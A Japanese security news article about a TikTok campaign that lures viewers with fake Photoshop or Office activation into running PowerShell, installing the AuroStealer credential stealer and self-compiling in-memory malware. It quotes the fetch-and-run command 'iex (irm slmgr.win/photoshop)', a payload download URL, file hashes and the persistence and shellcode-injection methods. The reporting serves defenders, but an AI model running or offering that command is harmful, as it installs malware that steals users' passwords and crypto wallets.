サイバーニュース.jp

世界のサイバーなニュースを配信

TikTok動画が悪用され、自己コンパイル型PowerShellマルウェアが拡散

カテゴリ:

, , , , , , , , ,

はじめに:TikTokを悪用した新たな脅威

サイバー攻撃者がTikTokの広範なリーチを悪用し、一見無害に見える動画を通じてユーザーを騙し、マルウェアを実行させる新たな手口が確認されました。特に、無料のPhotoshopアクティベーションツールを謳う人気TikTok動画(500回以上「いいね」を獲得)では、視聴者に対し、管理者としてPowerShellを開き、特定のコマンドを実行するよう促しています。

このコマンド、powershell iex (irm slmgr.win/photoshop)は、Invoke-Expression (iex)を使用して、悪意のあるホストからInvoke-RestMethod (irm)で取得したスクリプトを実行するものです。この手口は、Microsoftのブログでユーザーがコードをクリックして実行させられ、マルウェアがインストールされる「ClickFix」ソーシャルエンジニアリングシナリオと類似しています。

マルウェアの段階的展開:AuroStealerから高度な永続化まで

提供されたリンクにアクセスすると、被害者はPowerShellペイロード(SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23)を受け取ります。このペイロードは、現時点でのVirusTotal検出率が17/63と低く、その新規性と回避能力が浮き彫りになっています。

初期スクリプトが実行されると、https://file-epq.pages.dev/updater.exeに接続し、次の段階であるUpdater.exe(SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8)をダウンロードします。分析の結果、このバイナリは、保存されたブラウザのパスワードや仮想通貨ウォレットを窃取することで知られる認証情報窃取型トロイの木馬、AuroStealerであることが判明しました。

永続性を維持するため、PowerShellスクリプトは、正規の更新タスク(例:AdobeUpdateTaskWindowsUpdateCheck)のリストからランダムにタスク名を選択します。その後、隠しウィンドウでPowerShellを起動し、実行ポリシーをバイパスするスケジュールタスクを作成することで、Updater.exeがユーザーログオン時に疑われることなく実行されるようにします。正規のタスク名を使用することで、悪意のある永続化が通常のシステム動作に紛れ込み、検出を回避します。

高度な自己コンパイルとインメモリ実行

AuroStealerの段階に続き、source.exe(SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)というさらなるペイロードが取得され、起動されます。このバイナリは、高度な自己コンパイル型マルウェア技術を採用しています。実行中に、一時的な.cmdlineファイルに保存されたソースコードをコンパイルするために、.NETコンパイラcsc.exeを呼び出します。

コンパイルされたクラスには、VirtualAllocCreateThreadWaitForSingleObjectのP/Invoke宣言が含まれており、メモリの割り当て、プロセスへのシェルコードの直接注入、実行のためのスレッドの生成、そして無期限の待機を可能にします。これにより、最終的なペイロードはディスクに触れることなく、完全にメモリ内で実行されます。このようなオンデマンドコンパイルは、最終的な悪意のあるコードが一時的なメモリにのみ存在するため、静的解析や検出を困難にします。

キャンペーンの広がりと対策

研究者たちは、同じキャンペーンで「Officeをアクティベート」や「Windowsをアンロック」といった異なるソフトウェアの誘い文句を使用した追加のTikTok動画も確認しており、攻撃者がソーシャルエンジニアリングのテーマを繰り返し、リーチを広げようとしていることを示しています。

このキャンペーンは、サイバー犯罪者がショートフォーム動画プラットフォームを悪用し、PowerShellを介して自己コンパイル型インメモリマルウェアを配信するという、進化する戦術を浮き彫りにしています。ユーザーは、未検証のソースからのターミナルコマンドを絶対に実行すべきではありません。また、プラットフォームは、潜在的に危険な操作を促す指示がある場合、視聴者に警告することを検討すべきです。

攻撃者が絶えず革新を続ける中、新しい配信チャネルとアンチ分析技術を組み合わせたこれらの新たな脅威に対しては、セキュリティ意識と堅牢なエンドポイント防御が最善の防御策となります。

元記事: https://gbhackers.com/tiktok-videos/

投稿をさらに読み込む